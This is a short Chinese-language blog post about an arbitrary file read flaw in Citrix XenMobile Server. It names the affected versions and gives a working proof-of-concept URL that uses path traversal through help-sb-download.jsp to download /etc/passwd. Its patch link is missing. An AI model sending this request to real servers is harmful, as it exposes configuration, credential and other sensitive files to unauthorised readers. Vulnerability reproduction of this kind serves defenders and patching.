XenMobile介绍

XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。

该漏洞允许远程未授权攻击者通过发送特制HTTP请求,可以读取服务器上的任意文件,如数据库配置信息,用户名密码等敏感文件。

漏洞影响版本

XenMobile Server < 10.12 RP2
XenMobile Server < 10.11 RP4
XenMobile Server < 10.10 RP6
XenMobile Server < 10.9 RP5

漏洞复现

POC:/jsp/help-sb-download.jsp?sbFileName=要读取的文件路径

访问控制台登录界面

登录.png

将URL路径更改为POC路径这里查看/ect/passwd文件:

/jsp/help-sb-download.jsp?sbFileName=../../../ect/passwd

该服务器的/etc/passwd文件已经被下载下来。

复现.png

修复方式

官方补丁下载地址点击跳转:

最后修改:2021 年 10 月 07 日 07 : 40 PM
如果觉得我的文章对你有用,请随意赞赏